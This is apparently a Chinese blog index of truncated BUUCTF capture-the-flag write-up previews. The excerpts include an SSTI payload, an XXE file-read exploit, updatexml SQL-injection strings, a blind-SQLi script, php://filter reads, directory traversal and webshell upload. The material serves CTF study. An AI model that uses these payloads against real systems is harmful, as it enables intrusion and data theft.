BUUCTF刷题记录
关注
分享
扫一扫
Ushernrt
这个作者很懒,什么都没留下…
展开
-
[GKCTF 2021]excel 骚操作
打开之后,基本是一个空白的excel,一开始以为是用压缩软件解压缩,然后flag藏在那里面,后来发现没有,然后设置单元格格式为常规,可以显示出很多数字如图所示,看上去很像二维码。我们把有数字1的单元格涂成黑色。使用Ctrl + F修改合适的行高,列宽,最后是长这样,然后不是二维码,微信扫不出来,网上一查这叫汉信码,有专门的app可以扫描出来。中国编码可以扫描,flag{9ee0cb62-f443-4a72-e9a3-43c0b91075...原创 2021-09-24 14:33:07 · 2426 阅读 · 0 评论 -
[GKCTF 2021]FireFox Forensics
下载附件看到一个sqlite的数据库文件和一个json文件这是火狐浏览器中保存的密码,直接去整,github有一个firepwd工具可以直接解密得到flag链接:firepwdhttps://github.com/lclevy/firepwd.git直接运行可以得到flag...原创 2021-09-24 11:19:20 · 529 阅读 · 0 评论 -
[2021祥云杯]secrets_of_admin
题目给了源码,查看源码再database.ts中发现登录的用户名和密码。使用即可直接登录,database.ts文件除了提供了用户名和密码外还创建了一个files表,files表有文件所属用户,文件名和文件哈希,其中superuser用户有一个flag文件,这就是我们的目标。再index.ts中,有一个路由/api/files/:id可以通过提供用户名与id来读取数据库中的对应的文件,但是数据库中的flag文件时superuser用户的,但是代码进制superuser用户登录。还有一个.原创 2021-08-30 16:19:14 · 622 阅读 · 0 评论 -
[2021祥云杯]Package Manager 2021
看schema.ts就可以知道这里用的是mongodb。/auth存在sql注入漏洞,router.post('/auth', async (req, res) => { let { token } = req.body; if (token !== '' && typeof (token) === 'string') { if (checkmd5Regex(token)) { try { let docs = await User.$where(`th原创 2021-08-30 11:18:05 · 471 阅读 · 0 评论 -
[BJDCTF2020]EzPHP
打开之后是卡巴斯基的网络威胁实时地图,右键不能查看源码 F12打开调试器,查看元素base32解码,得到了一个页面,打开之后是源码,<?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><...原创 2021-08-11 16:57:20 · 329 阅读 · 0 评论 -
[GKCTF 2021]babycat
这道题点开始注册登录界面,但是点击注册按钮会提示Not Allowed。但是查看源码会发现这里是直接跳出了Not Allowed,构造POST请求,通过burp发包注册一个账号。注册成功,登录后又上传和下载两个功能,我们发现下载有一个目录穿越,尝试读取,/WEB-INF/web.xml.由于上传功能只有管理员可以使用它,因此可以根据xml的内容构造出,../../WEB-INF/classes/com/web/servlet/registerServlet.class,...原创 2021-08-11 12:46:01 · 934 阅读 · 2 评论 -
[HFCTF2020]JustEscape
页面有提示肯定有个run.php其次code要经过url编码才能计算数学题,当然,这也不一定是php。在nodejs中也有eval函数,可以用Error().stack测试一下,可以看到是有vm.js文件,应该可以确认是vm沙箱逃逸,这里面有最新的沙箱逃逸的poc,https://github.com/patriksimek/vm2/issues/225但是直接用肯定会被waf拦截,经过探测 waf过滤了下面的关键字['for', 'while', 'process',...原创 2021-08-10 16:42:34 · 548 阅读 · 0 评论 -
[NPUCTF2020]ezinclude
看一下源码,好像是哈希长度扩展攻击,但是不知道长度,所以不太可能用爆破,然后在response里给了hash值,直接pass传一下,会提示跳转到flflflflag.php。直接跳转,这里如果直接用浏览器打开的话,会跳转到404.html,这里看到一个文件包含,使用伪协议读一下flflflflag.php的源码,/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.p..原创 2021-08-10 10:56:26 · 1158 阅读 · 0 评论 -
[WUSTCTF2020]alison_likes_jojo
下载题目之后,有一个txt文档和两张图片,binwalk分析发现boki.jpg有隐藏文件,foremost分离。压缩包有加密,爆破。爆破得到口令888866base64解码,解密三次后有了一个字符串,jljy.jpg室outguess隐写,解出的字符串是他的密钥,...原创 2021-08-04 10:00:36 · 350 阅读 · 0 评论 -
[CISCN2019 华东南赛区]Double Secret
打开之后只有这个后台有robots.txt但是里面什么都没有,猜一下这个后面应该有个secret页面,果然有一个,原创 2021-07-28 10:09:06 · 180 阅读 · 0 评论 -
[RootersCTF2019]I_<3_Flask
知识点:url参数爆破,ssti第一步使用 Arjun爆破url参数,爆破出来参数name接下来就可以尝试ssti,去网上找个payload 打一下。{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% .原创 2021-07-27 10:21:46 · 130 阅读 · 0 评论 -
[WUSTCTF2020]CV Maker
随便注册个账号登录,然后可以更换图像,上传一个一句话,就可以连接蚁剑,获取flag。原创 2021-07-26 17:02:14 · 219 阅读 · 0 评论 -
[watevrCTF-2019]Cookie Store
打开之后是一个饼干购买商城的页面,发现我有50块钱,但是想要购买flag需要100块,买不起,给自己加点钱吧,使用editthiscookie可以修改cookie。修改money的数量, 然后base64 编码修改一下cookie的值。刷新后发现自己的钱变多了,直接买flag就可以了。...原创 2021-07-26 15:39:42 · 378 阅读 · 0 评论 -
[NCTF2019]SQLi
打开之后是一个登录界面,扫描后台之后发现robots.txt打开提示查看,$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";..原创 2021-07-26 14:50:48 · 110 阅读 · 0 评论 -
[b01lers2020]Welcome to Earth
打开之后,没一会儿就会跳到die页面,查看源码才发现有个定时器,<!DOCTYPE html><html> <head> <title>Welcome to Earth</title> </head> <body> <h1>AMBUSH!</h1> <p>You've gotta escape!</p> &l..原创 2021-07-26 11:19:59 · 196 阅读 · 0 评论 -
[HarekazeCTF2019]encode_and_encode
这道题目打开只有上面三个连接,点击查看源码。<?phperror_reporting(0);if (isset($_GET['source'])) { show_source(__FILE__); exit();}function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp...原创 2021-07-23 17:03:54 · 192 阅读 · 0 评论 -
[网鼎杯 2020 白虎组]PicDown
打开之后只有一个输入框,参数只有一个url,想到是否可以读取任意文件,结果输入../../../../../flag可以读取到,也可以直接读取flag。原创 2021-07-26 11:30:37 · 122 阅读 · 0 评论 -
[SUCTF 2019]EasyWeb
这个题目过滤的很严格,字母数字都不允许使用。<?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_原创 2021-07-15 11:21:46 · 135 阅读 · 0 评论 -
[SWPUCTF 2018]SimplePHP
打开之后发现是一个上传文件的网站,本来以为是上传文件,然后getshell获取flag,后来发现还是年轻了啊。查看文件的链接中有文件包含,首页的源码中有flag的位置。可以利用文件包含查看所有php源码,file.php<?php header("content-type:text/html;charset=utf-8"); include 'function.php'; include 'class.php'; ini_set('open_basedir','/va.原创 2021-07-14 17:19:29 · 312 阅读 · 0 评论 -
[HFCTF2020]EasyLogin
注册账号登陆之后,可以看到一个GET FLAG 的按钮,直接点击会提示权限不足。查看源码发现了app.js,node.js写的后端框架是koa,逻辑代码应该是controllers下的api.js.koa的框架结构如图所示/** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */function login() { const username = $("#username").val(); ...原创 2021-07-09 14:13:59 · 1179 阅读 · 0 评论 -
[HITCON 2017]SSRFme
打开题目是有源码的,源码如下:<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $san原创 2021-07-08 09:58:47 · 163 阅读 · 0 评论 -
[网鼎杯 2018]Comment
知识点:密码爆破 代码审计 二次注入 文件恢复打开之后是一个发表评论的界面,尝试发表一下,发现需要登录,登录界面提示密码只缺三位需要爆破,直接通过burp即可爆出密码为zhangwei666登录在控制台发现有提示,应该是git恢复,扫一下后台发现了git文件使用githacker恢复源码,但是恢复不全,<?phpinclude "mysql.php";session_start();if($_SESSION['login'] != 'ye原创 2021-07-07 16:44:24 · 195 阅读 · 0 评论 -
[RCTF2015]EasySQL
打开之后只有注册和登录,注册账户进入之后发现可以修改密码,应该是二次注入,当username=admin"&password=123456时,进行修改密码,可以触发报错这样就可以构造payload来进行sql注入获取表名可以构造如下的payloadadmin"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=datab原创 2021-07-07 10:18:18 · 123 阅读 · 0 评论 -
[CSCCTF 2019 Qual]FlaskLight
打开题目,F12查看源码有提示,提示可以使用search参数,或者使用Arjun直接扫描也可以扫描出search参数,使用下面爆出类,{{().__class__.__base__.__subclasses__()}}[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'b原创 2021-07-06 15:02:54 · 323 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
查看源码有提示可以使用file参数,但是,直接在file跟文件名无法查看,使用php伪协议可以查看到文件内容,/?file=php://filter/convert.base64-encode/resource=index.php解码后是代码,<?php //index.phpini_set('open_basedir', '/var/www/html/');// $file = $_GET["file"];$file = (isset($_GET['file原创 2021-07-06 10:58:11 · 199 阅读 · 1 评论 -
[Zer0pts2020]Can you guess it?
<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['source'])) { highlight_file(.原创 2021-07-05 11:24:18 · 90 阅读 · 0 评论 -
[CISCN2019 总决赛 Day2 Web1]Easyweb
通过robots.txt文件找到应该有备份文件,查看源码有打开image.php.bak,有源码文件原创 2021-07-02 15:34:20 · 93 阅读 · 2 评论 -
[FBCTF2019]RCEService
要求输入json格式的内容,网上找到了源码,<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias..原创 2021-06-30 15:28:45 · 123 阅读 · 0 评论 -
[BSidesCF 2019]Kookie
网站提示我们使用admin用户登录,并且有cookie和monster两个账户。将cookie修改为username=admin即可获取到flag原创 2021-06-30 14:36:59 · 89 阅读 · 0 评论 -
[WUSTCTF2020]颜值成绩查询
知识点:整数型注入 盲注import requestsurl = "http://364ccd4d-2a09-471c-ba97-460b37d0fbae.node3.buuoj.cn/?stunum="result = ""i = 0while(True): i = i + 1 head = 32 tail = 127 while( head < tail): mid = (head + tail) >> 1 #爆表 #payload =原创 2021-06-30 11:50:03 · 82 阅读 · 0 评论 -
[GWCTF 2019]枯燥的抽奖
查看源代码发现,输入框中的内容提交给check.php,输入check.php发现可以查看源码。fSFdLI1f9Y<?php#这不是抽奖程序的源代码!不许看!header("Content-Type: text/html;charset=utf-8");session_start();if(!isset($_SESSION['seed'])){$_SESSION['seed']=rand(0,999999999);}mt_srand($_SESSION['seed'...原创 2021-06-30 10:13:36 · 137 阅读 · 0 评论 -
[极客大挑战 2019]RCE ME
打开后是源码,进行源码审计。<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");原创 2021-06-29 17:28:54 · 217 阅读 · 1 评论 -
[MRCTF2020]套娃
查看源码有注释代码如下:$query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!');} if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "原创 2021-06-29 16:02:33 · 410 阅读 · 0 评论 -
[BSidesCF 2019]Futurella
查看源码就可以获得flag。原创 2021-06-23 16:14:49 · 105 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web2]ikun
题目有提示,要买到lv6,我往后翻了大约7、8页也没有翻到lv6,但题目还有有规律的直接写代码,查看有没有lv6吧。import requestsurl="http://d97cc2f1-db2a-4a7e-b764-b5314ae6faf1.node3.buuoj.cn/shop?page="for i in range(0, 2000): r=requests.get(url+str(i)) print("for"+str(i)) if 'lv6.png' in原创 2021-06-23 14:41:53 · 149 阅读 · 1 评论 -
[GYCTF2020]FlaskApp
知识点:FLASK SSTIssti绕过pin生成题目已经提示是flask,直接找一下原创 2021-06-21 16:01:17 · 332 阅读 · 0 评论 -
[BJDCTF2020]EasySearch
<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,7.原创 2021-06-21 10:03:16 · 155 阅读 · 3 评论 -
[CISCN2019 华东南赛区]Web11
知识点:smarty 模板注入。Smarty SSTI原创 2021-06-11 14:38:17 · 137 阅读 · 3 评论 -
[NCTF2019]True XML cookbook
抓包一看就知道可能是xxe漏洞,拿个exp直接发过去看看效果。<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [ <!ENTITY abc SYSTEM "file:///flag"> ]><user><username>&abc;</username><password>123456</password></user>.原创 2021-06-11 10:50:39 · 1223 阅读 · 0 评论 -
[MRCTF2020]Ezpop
<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public function append($val.原创 2021-06-10 17:24:05 · 110 阅读 · 2 评论